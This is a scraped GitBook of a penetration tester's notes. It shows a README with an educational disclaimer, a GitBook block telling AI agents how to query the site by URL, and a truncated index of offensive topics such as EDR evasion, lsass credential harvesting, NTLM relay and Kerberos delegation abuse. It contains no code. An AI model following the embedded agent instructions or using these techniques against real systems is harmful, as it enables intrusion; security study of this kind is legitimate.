# Table of Contents - [README | Pentester's Promiscuous Notebook](#readme-pentester-s-promiscuous-notebook) - [Unknown](#unknown) - [Unknown](#unknown) - [C2 | Pentester's Promiscuous Notebook](#c2-pentester-s-promiscuous-notebook) - [Unknown](#unknown) - [Covenant | Pentester's Promiscuous Notebook](#covenant-pentester-s-promiscuous-notebook) - [Empire | Pentester's Promiscuous Notebook](#empire-pentester-s-promiscuous-notebook) - [Cobalt Strike | Pentester's Promiscuous Notebook](#cobalt-strike-pentester-s-promiscuous-notebook) - [Unknown](#unknown) - [Havoc | Pentester's Promiscuous Notebook](#havoc-pentester-s-promiscuous-notebook) - [Unknown](#unknown) - [Unknown](#unknown) - [PoshC2 | Pentester's Promiscuous Notebook](#poshc2-pentester-s-promiscuous-notebook) - [Basics | Pentester's Promiscuous Notebook](#basics-pentester-s-promiscuous-notebook) - [Git | Pentester's Promiscuous Notebook](#git-pentester-s-promiscuous-notebook) - [BOF | Pentester's Promiscuous Notebook](#bof-pentester-s-promiscuous-notebook) - [Sliver | Pentester's Promiscuous Notebook](#sliver-pentester-s-promiscuous-notebook) - [Shodan | Pentester's Promiscuous Notebook](#shodan-pentester-s-promiscuous-notebook) - [Networking | Pentester's Promiscuous Notebook](#networking-pentester-s-promiscuous-notebook) - [Personal | Pentester's Promiscuous Notebook](#personal-pentester-s-promiscuous-notebook) - [OSINT | Pentester's Promiscuous Notebook](#osint-pentester-s-promiscuous-notebook) - [WAF | Pentester's Promiscuous Notebook](#waf-pentester-s-promiscuous-notebook) - [Routing | Pentester's Promiscuous Notebook](#routing-pentester-s-promiscuous-notebook) - [Quick Configurations | Pentester's Promiscuous Notebook](#quick-configurations-pentester-s-promiscuous-notebook) - [2FA Bypass | Pentester's Promiscuous Notebook](#2fa-bypass-pentester-s-promiscuous-notebook) - [Reverse Shells | Pentester's Promiscuous Notebook](#reverse-shells-pentester-s-promiscuous-notebook) - [Infrastructure | Pentester's Promiscuous Notebook](#infrastructure-pentester-s-promiscuous-notebook) - [WordPress | Pentester's Promiscuous Notebook](#wordpress-pentester-s-promiscuous-notebook) - [LFI / RFI | Pentester's Promiscuous Notebook](#lfi-rfi-pentester-s-promiscuous-notebook) - [SOP / CORS | Pentester's Promiscuous Notebook](#sop-cors-pentester-s-promiscuous-notebook) - [C2 | Pentester's Promiscuous Notebook](#c2-pentester-s-promiscuous-notebook) - [XSS | Pentester's Promiscuous Notebook](#xss-pentester-s-promiscuous-notebook) - [WPA / WPA2 | Pentester's Promiscuous Notebook](#wpa-wpa2-pentester-s-promiscuous-notebook) - [Password Brute Force | Pentester's Promiscuous Notebook](#password-brute-force-pentester-s-promiscuous-notebook) - [Generate Wordlists | Pentester's Promiscuous Notebook](#generate-wordlists-pentester-s-promiscuous-notebook) - [SQLi | Pentester's Promiscuous Notebook](#sqli-pentester-s-promiscuous-notebook) - [Infrastructure | Pentester's Promiscuous Notebook](#infrastructure-pentester-s-promiscuous-notebook) - [Virtualization | Pentester's Promiscuous Notebook](#virtualization-pentester-s-promiscuous-notebook) - [VMWare | Pentester's Promiscuous Notebook](#vmware-pentester-s-promiscuous-notebook) - [Kali | Pentester's Promiscuous Notebook](#kali-pentester-s-promiscuous-notebook) - [API Hashing | Pentester's Promiscuous Notebook](#api-hashing-pentester-s-promiscuous-notebook) - [Sandbox Evasion | Pentester's Promiscuous Notebook](#sandbox-evasion-pentester-s-promiscuous-notebook) - [Windows API | Pentester's Promiscuous Notebook](#windows-api-pentester-s-promiscuous-notebook) - [Kernel Mode | Pentester's Promiscuous Notebook](#kernel-mode-pentester-s-promiscuous-notebook) - [Syscalls | Pentester's Promiscuous Notebook](#syscalls-pentester-s-promiscuous-notebook) - [OSED SEH Overflow | Pentester's Promiscuous Notebook](#osed-seh-overflow-pentester-s-promiscuous-notebook) - [Meterpreter | Pentester's Promiscuous Notebook](#meterpreter-pentester-s-promiscuous-notebook) - [Web Shells | Pentester's Promiscuous Notebook](#web-shells-pentester-s-promiscuous-notebook) - [VirtualBox | Pentester's Promiscuous Notebook](#virtualbox-pentester-s-promiscuous-notebook) - [Hyper-V | Pentester's Promiscuous Notebook](#hyper-v-pentester-s-promiscuous-notebook) - [Wi-Fi | Pentester's Promiscuous Notebook](#wi-fi-pentester-s-promiscuous-notebook) - [DHCP Server & Linux Hotspot | Pentester's Promiscuous Notebook](#dhcp-server-linux-hotspot-pentester-s-promiscuous-notebook) - [Enterprise | Pentester's Promiscuous Notebook](#enterprise-pentester-s-promiscuous-notebook) - [API Hooking | Pentester's Promiscuous Notebook](#api-hooking-pentester-s-promiscuous-notebook) - [Golang | Pentester's Promiscuous Notebook](#golang-pentester-s-promiscuous-notebook) - [CFG | Pentester's Promiscuous Notebook](#cfg-pentester-s-promiscuous-notebook) - [Nim | Pentester's Promiscuous Notebook](#nim-pentester-s-promiscuous-notebook) - [RE | Pentester's Promiscuous Notebook](#re-pentester-s-promiscuous-notebook) - [WinDbg | Pentester's Promiscuous Notebook](#windbg-pentester-s-promiscuous-notebook) - [Docker | Pentester's Promiscuous Notebook](#docker-pentester-s-promiscuous-notebook) - [WireGuard | Pentester's Promiscuous Notebook](#wireguard-pentester-s-promiscuous-notebook) - [OSCP BOF | Pentester's Promiscuous Notebook](#oscp-bof-pentester-s-promiscuous-notebook) - [Windows | Pentester's Promiscuous Notebook](#windows-pentester-s-promiscuous-notebook) - [PIC / Shellcode | Pentester's Promiscuous Notebook](#pic-shellcode-pentester-s-promiscuous-notebook) - [Process Hollowing | Pentester's Promiscuous Notebook](#process-hollowing-pentester-s-promiscuous-notebook) - [NTP | Pentester's Promiscuous Notebook](#ntp-pentester-s-promiscuous-notebook) - [DLL Hijacking | Pentester's Promiscuous Notebook](#dll-hijacking-pentester-s-promiscuous-notebook) - [Linux | Pentester's Promiscuous Notebook](#linux-pentester-s-promiscuous-notebook) - [DLL Injectors | Pentester's Promiscuous Notebook](#dll-injectors-pentester-s-promiscuous-notebook) - [Subdomain Takeover | Pentester's Promiscuous Notebook](#subdomain-takeover-pentester-s-promiscuous-notebook) - [BOF / COFF | Pentester's Promiscuous Notebook](#bof-coff-pentester-s-promiscuous-notebook) - [Web | Pentester's Promiscuous Notebook](#web-pentester-s-promiscuous-notebook) - [Information Gathering | Pentester's Promiscuous Notebook](#information-gathering-pentester-s-promiscuous-notebook) - [Lync & Skype for Business | Pentester's Promiscuous Notebook](#lync-skype-for-business-pentester-s-promiscuous-notebook) - [SharePoint | Pentester's Promiscuous Notebook](#sharepoint-pentester-s-promiscuous-notebook) - [Development | Pentester's Promiscuous Notebook](#development-pentester-s-promiscuous-notebook) - [Log4j / Log4Shell | Pentester's Promiscuous Notebook](#log4j-log4shell-pentester-s-promiscuous-notebook) - [ADFS | Pentester's Promiscuous Notebook](#adfs-pentester-s-promiscuous-notebook) - [Java RMI | Pentester's Promiscuous Notebook](#java-rmi-pentester-s-promiscuous-notebook) - [1C | Pentester's Promiscuous Notebook](#1c-pentester-s-promiscuous-notebook) - [DNS | Pentester's Promiscuous Notebook](#dns-pentester-s-promiscuous-notebook) - [Cisco | Pentester's Promiscuous Notebook](#cisco-pentester-s-promiscuous-notebook) - [IPSec | Pentester's Promiscuous Notebook](#ipsec-pentester-s-promiscuous-notebook) - [SSH | Pentester's Promiscuous Notebook](#ssh-pentester-s-promiscuous-notebook) - [Authentication Brute Force | Pentester's Promiscuous Notebook](#authentication-brute-force-pentester-s-promiscuous-notebook) - [Perimeter | Pentester's Promiscuous Notebook](#perimeter-pentester-s-promiscuous-notebook) - [SMTP | Pentester's Promiscuous Notebook](#smtp-pentester-s-promiscuous-notebook) - [Shells | Pentester's Promiscuous Notebook](#shells-pentester-s-promiscuous-notebook) - [Outlook | Pentester's Promiscuous Notebook](#outlook-pentester-s-promiscuous-notebook) - [VNC | Pentester's Promiscuous Notebook](#vnc-pentester-s-promiscuous-notebook) - [NFS | Pentester's Promiscuous Notebook](#nfs-pentester-s-promiscuous-notebook) - [SNMP | Pentester's Promiscuous Notebook](#snmp-pentester-s-promiscuous-notebook) - [OWA | Pentester's Promiscuous Notebook](#owa-pentester-s-promiscuous-notebook) - [TFTP | Pentester's Promiscuous Notebook](#tftp-pentester-s-promiscuous-notebook) - [Kiosk Breakout | Pentester's Promiscuous Notebook](#kiosk-breakout-pentester-s-promiscuous-notebook) - [IPMI | Pentester's Promiscuous Notebook](#ipmi-pentester-s-promiscuous-notebook) - [On-Prem ↔ Cloud | Pentester's Promiscuous Notebook](#on-prem-cloud-pentester-s-promiscuous-notebook) - [PRT Abuse | Pentester's Promiscuous Notebook](#prt-abuse-pentester-s-promiscuous-notebook) - [Cloud → On-Prem | Pentester's Promiscuous Notebook](#cloud-on-prem-pentester-s-promiscuous-notebook) - [Exchange | Pentester's Promiscuous Notebook](#exchange-pentester-s-promiscuous-notebook) - [FireBird | Pentester's Promiscuous Notebook](#firebird-pentester-s-promiscuous-notebook) - [Azure AD | Pentester's Promiscuous Notebook](#azure-ad-pentester-s-promiscuous-notebook) - [SSH | Pentester's Promiscuous Notebook](#ssh-pentester-s-promiscuous-notebook) - [DBMS | Pentester's Promiscuous Notebook](#dbms-pentester-s-promiscuous-notebook) - [SQLite | Pentester's Promiscuous Notebook](#sqlite-pentester-s-promiscuous-notebook) - [Networks | Pentester's Promiscuous Notebook](#networks-pentester-s-promiscuous-notebook) - [File Transfer | Pentester's Promiscuous Notebook](#file-transfer-pentester-s-promiscuous-notebook) - [NAC Bypass | Pentester's Promiscuous Notebook](#nac-bypass-pentester-s-promiscuous-notebook) - [SIP / VoIP | Pentester's Promiscuous Notebook](#sip-voip-pentester-s-promiscuous-notebook) - [Sniff Traffic | Pentester's Promiscuous Notebook](#sniff-traffic-pentester-s-promiscuous-notebook) - [Redis | Pentester's Promiscuous Notebook](#redis-pentester-s-promiscuous-notebook) - [MySQL / MariaDB | Pentester's Promiscuous Notebook](#mysql-mariadb-pentester-s-promiscuous-notebook) - [Oracle | Pentester's Promiscuous Notebook](#oracle-pentester-s-promiscuous-notebook) - [Atlassian | Pentester's Promiscuous Notebook](#atlassian-pentester-s-promiscuous-notebook) - [On-Prem → Cloud | Pentester's Promiscuous Notebook](#on-prem-cloud-pentester-s-promiscuous-notebook) - [Low-Hanging Fruits | Pentester's Promiscuous Notebook](#low-hanging-fruits-pentester-s-promiscuous-notebook) - [DevOps | Pentester's Promiscuous Notebook](#devops-pentester-s-promiscuous-notebook) - [Zabbix | Pentester's Promiscuous Notebook](#zabbix-pentester-s-promiscuous-notebook) - [Post Exploitation | Pentester's Promiscuous Notebook](#post-exploitation-pentester-s-promiscuous-notebook) - [L2 | Pentester's Promiscuous Notebook](#l2-pentester-s-promiscuous-notebook) - [VS Code | Pentester's Promiscuous Notebook](#vs-code-pentester-s-promiscuous-notebook) - [Ansible | Pentester's Promiscuous Notebook](#ansible-pentester-s-promiscuous-notebook) - [Artifactory | Pentester's Promiscuous Notebook](#artifactory-pentester-s-promiscuous-notebook) - [VLAN Hopping | Pentester's Promiscuous Notebook](#vlan-hopping-pentester-s-promiscuous-notebook) - [SNACs Abuse | Pentester's Promiscuous Notebook](#snacs-abuse-pentester-s-promiscuous-notebook) - [HashiCorp Vault | Pentester's Promiscuous Notebook](#hashicorp-vault-pentester-s-promiscuous-notebook) - [DHCPv6 Spoofing | Pentester's Promiscuous Notebook](#dhcpv6-spoofing-pentester-s-promiscuous-notebook) - [LLMNR / NBNS Poisoning | Pentester's Promiscuous Notebook](#llmnr-nbns-poisoning-pentester-s-promiscuous-notebook) - [Persistence | Pentester's Promiscuous Notebook](#persistence-pentester-s-promiscuous-notebook) - [Jenkins | Pentester's Promiscuous Notebook](#jenkins-pentester-s-promiscuous-notebook) - [GitLab | Pentester's Promiscuous Notebook](#gitlab-pentester-s-promiscuous-notebook) - [Containerization / Orchestration | Pentester's Promiscuous Notebook](#containerization-orchestration-pentester-s-promiscuous-notebook) - [ARP Spoofing | Pentester's Promiscuous Notebook](#arp-spoofing-pentester-s-promiscuous-notebook) - [Pivoting | Pentester's Promiscuous Notebook](#pivoting-pentester-s-promiscuous-notebook) - [MS SQL | Pentester's Promiscuous Notebook](#ms-sql-pentester-s-promiscuous-notebook) --- # README | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/readme.md) . ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-144539301bfa38a506afc64d0b4c4e2feb428f49%252Flogo.png%3Falt%3Dmedia%26token%3D20989e1b-f21b-4ec2-8fed-d1e0f2b87aab&width=768&dpr=3&quality=100&sign=b16b84fc&sv=2) Hey there! I'm [snovvcrash](https://snovvcra.sh/about) and I do ethical penetration testing, red teaming, offensive tooling development and cybersecurity researching. This is a GitBook of mine whose purpose is keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... **responsibly**, of course! While taking these notes, one main rule is that all the given techniques are actually tested either during an authorized engagement or in a training lab. **DISCLAIMER.** All information contained in this blog is provided for educational and research purposes only. The author is not responsible for any illegal use of any information published on the pages of this blog. [](https://ppn.snovvcra.sh/#telegram-channel) Telegram Channel ------------------------------------------------------------------- [![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-680cab47345055d46586960d27ef2e97d3add131%252FOffensiveTwitter.png%3Falt%3Dmedia&width=300&dpr=3&quality=100&sign=3d819bd1&sv=2)](https://t.me/OffensiveTwitter) _**https://t.me/OffensiveTwitter**_ [](https://ppn.snovvcra.sh/#about) About --------------------------------------------- [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fsnovvcra.sh%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=39de3028&sv=2)snovvcrash@gh-pages:~$ \_snovvcrash@gh-pages:~$ \_](https://snovvcra.sh/) [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=f7842e06&sv=2)snovvcrash - OverviewGitHub](https://github.com/snovvcrash) [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Finfosec.exchange%2Fpacks%2Fassets%2Fapple-touch-icon-1024x1024-CgAd45Kl.png&width=20&dpr=3&quality=100&sign=48066abb&sv=2)sn🥶vvcr💥sh (@snovvcrash@infosec.exchange)Infosec Exchange](https://infosec.exchange/@snovvcrash) Last updated 8 months ago --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://ppn.snovvcra.sh/readme.md). # README !\[\](/files/-MctprY79iExne46nCJG) Hey there! I'm \[snovvcrash\](https://snovvcra.sh/about) and I do ethical penetration testing, red teaming, offensive tooling development and cybersecurity researching. This is a GitBook of mine whose purpose is keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... \*\*responsibly\*\*, of course! While taking these notes, one main rule is that all the given techniques are actually tested either during an authorized engagement or in a training lab. {% hint style="warning" %} \*\*DISCLAIMER.\*\* All information contained in this blog is provided for educational and research purposes only. The author is not responsible for any illegal use of any information published on the pages of this blog. {% endhint %} ## Telegram Channel \[!\[\](/files/u2ahoLiVRbcUEvTAsD6u)\](https://t.me/OffensiveTwitter) \*\*\*\*\*\* ## About {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter: \`\`\` GET https://ppn.snovvcra.sh/readme.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \# Pentester's Promiscuous Notebook ## Pentester's Promiscuous Notebook - \[README\](https://ppn.snovvcra.sh/readme.md) - \[C2\](https://ppn.snovvcra.sh/pentest/c2.md) - \[Cobalt Strike\](https://ppn.snovvcra.sh/pentest/c2/cobalt-strike.md) - \[Covenant\](https://ppn.snovvcra.sh/pentest/c2/covenant.md) - \[Empire\](https://ppn.snovvcra.sh/pentest/c2/empire.md) - \[Havoc\](https://ppn.snovvcra.sh/pentest/c2/havoc.md) - \[Meterpreter\](https://ppn.snovvcra.sh/pentest/c2/meterpreter.md) - \[PoshC2\](https://ppn.snovvcra.sh/pentest/c2/poshc2.md) - \[Sliver\](https://ppn.snovvcra.sh/pentest/c2/sliver.md) - \[Infrastructure\](https://ppn.snovvcra.sh/pentest/infrastructure.md) - \[AD\](https://ppn.snovvcra.sh/pentest/infrastructure/ad.md) - \[ACL Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/acl-abuse.md): Access Control Lists - \[AD CS Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse.md): Active Directory Certificate Services - \[dNSHostName Spoofing (Certifried)\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/dnshostname-spoofing-certifried.md): CVE-2022-26923 - \[ESC1\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/esc1.md): Modifiable SAN + Smart Card Logon or Client Authentication or PKINIT Client Authentication EKUs - \[ESC4\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/esc4.md): Vulnerable Certificate Template ACEs - \[ESC8\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/esc8.md): NTLM Relay to AD CS HTTP Endpoints - \[ESC15\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/esc15.md): Inject Application Policies into Version 1 Certificate Templates (CVE-2024-49019) - \[Golden Certificate\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/golden-certificate.md): THEFT3 + DPERSIST1 - \[Pass-the-Certificate\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/ptc.md): Schannel authentication - \[ADIDNS Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/adidns-abuse.md): Active Directory integrated DNS - \[Attack Trusts\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/attack-trusts.md) - \[Attack RODCs\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/attack-rodc.md): Read-Only Domain Controllers - \[AV / EDR Evasion\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion.md) - \[.NET Assembly\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly.md) - \[.NET Config Loader\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-config-loader.md) - \[.NET Dynamic API Invocation\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-dynamic-api-invocation.md) - \[.NET In-Memory Assembly\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md) - \[.NET Reflective Assembly\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-reflective-assembly.md) - \[AMSI Bypass\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md): Antimalware Scan Interface - \[Application Whitelist Bypass\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/application-whitelist-bypass.md) - \[AppLocker Bypass\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/applocker-bypass.md) - \[BYOVD\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/byovd.md): Bring Your Own Vulnerable Driver - \[CLM Bypass\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/clm-bypass.md): PowerShell Constrained Language Mode - \[Defender\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/defender.md): Microsoft Defender - \[ETW Block\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/etw-block.md): Event Tracing for Windows - \[Execution Policy Bypass\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/executionpolicy-bypass.md) - \[Mimikatz\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/mimikatz.md) - \[UAC Bypass\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/uac-bypass.md): User Account Control - \[Authentication Coercion\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/authentication-coercion.md) - \[Credentials Harvesting\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting.md) - \[From Memory\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/from-memory.md) - \[lsass.exe\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md): Local Security Authority Subsystem Service - \[svchost.exe\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/from-memory/svchost-exe.md) - \[Credential Phishing\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/credential-phishing.md) - \[DCSync\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/dcsync.md): DS-Replication-Get-Changes + DS-Replication-Get-Changes-All - \[DPAPI\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/dpapi.md): Data Protection API - \[KeePass\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/keepass.md) - \[Linux\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/linux.md) - \[LSA\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/lsa.md): Local Security Authority - \[NetSync\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/netsync.md): Silver Ticket -> Netlogon (MS-NRPC) - \[NPLogonNotify\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/nplogonnotify.md) - \[NTDS\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/ntds.md): Windows NT Directory Services + DCSync - \[Password Filter\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/password-filter.md) - \[RDP\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/rdp.md): Remote Desktop Protocol - \[SAM\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/sam.md): Security Account Manager - \[SSH Clients\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md) - \[SSPI\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/sspi.md): Security Support Provider Interface - \[Windows Hello\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/windows-hello.md) - \[Discovery\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/discovery.md) - \[DnsAdmins\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/dnsadmins.md) - \[Dominance\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/dominance.md) - \[gMSA / dMSA\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/gmsa-dmsa.md): Group Managed Service Accounts / Delegated Managed Service Accounts - \[GPO Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/gpo-abuse.md): Group Policy Objects - \[Kerberos\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos.md) - \[Delegation Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/delegation-abuse.md) - \[Constrained\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/delegation-abuse/kcd.md) - \[Resource-based Constrained\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/delegation-abuse/rbcd.md) - \[Unconstrained\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/delegation-abuse/kud.md) - \[Kerberos Relay\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/kerberos-relay.md) - \[Roasting\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/roasting.md) - \[Key Credentials Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/key-credentials-abuse.md) - \[LAPS\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/laps.md): Local Administrator Password Solution - \[Lateral Movement\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement.md) - \[DCOM\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/dcom.md): Distributed COM - \[Overpass-the-Hash\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/over-pth.md) - \[Pass-the-Hash\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/pth.md) - \[Pass-the-Ticket\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/ptt.md) - \[RDP\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/rdp.md): Remote Desktop Protocol - \[RPC\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/rpc.md): Remote Procedure Call - \[RunAs\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/runas.md) - \[SMB\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/smb.md): Server Message Block - \[SPN-jacking\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/spn-jacking.md) - \[WinRM / PSRemoting\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/winrm.md): Windows Remote Management / PowerShell Remoting - \[WMI\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/wmi.md): Windows Management Instrumentation - \[LDAP\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ldap-ldaps.md): Lightweight Directory Access Protocol - \[NTLM\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ntlm.md): NT / LM Hashes - \[NTLM Relay\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ntlm/ntlm-relay.md) - \[NTLMv1 Downgrade\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/ntlm/ntlmv1-downgrade.md) - \[Password Spraying\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/password-spraying.md) - \[Post Exploitation\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/post-exploitation.md): Post Exploitation in Active Directory - \[Pre-created Computers Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/pre-created-computers-abuse.md): Pre-created Computer Accounts & Pre-Windows 2000 - \[PrivExchange\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privexchange.md): CVE-2019-0686, CVE-2019-0724 - \[Privileges Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privileges-abuse.md) - \[SeBackupPrivilege & SeRestorePrivilege\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privileges-abuse/sebackup-serestore.md) - \[SeImpersonatePrivilege\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privileges-abuse/seimpersonate.md) - \[Potatoes\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privileges-abuse/seimpersonate/potatoes.md) - \[PrintSpoofer\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privileges-abuse/seimpersonate/printspoofer.md) - \[SeTrustedCredmanAccess\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privileges-abuse/setrustedcredmanaccess.md) - \[RID Cycling\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/rid-cycling.md): Relative Identifier - \[SCCM Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/sccm-abuse.md): System Center Configuration Manager / Microsoft Endpoint Configuration Manager - \[SMB\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/smb.md): Server Message Block - \[Token Manipulation\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/token-manipulation.md) - \[User Hunt\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/user-hunt.md) - \[WSUS\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/wsus.md): Windows Server Update Services - \[Zerologon\](https://ppn.snovvcra.sh/pentest/infrastructure/ad/zerologon.md): CVE-2020-1472 - \[Azure AD\](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad.md) - \[On-Prem ↔ Cloud\](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud.md) - \[Cloud → On-Prem\](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/cloud-on-prem.md) - \[On-Prem → Cloud\](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md) - \[PRT Abuse\](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/prt-abuse.md): Primary Refresh Tokens - \[DevOps\](https://ppn.snovvcra.sh/pentest/infrastructure/devops.md) - 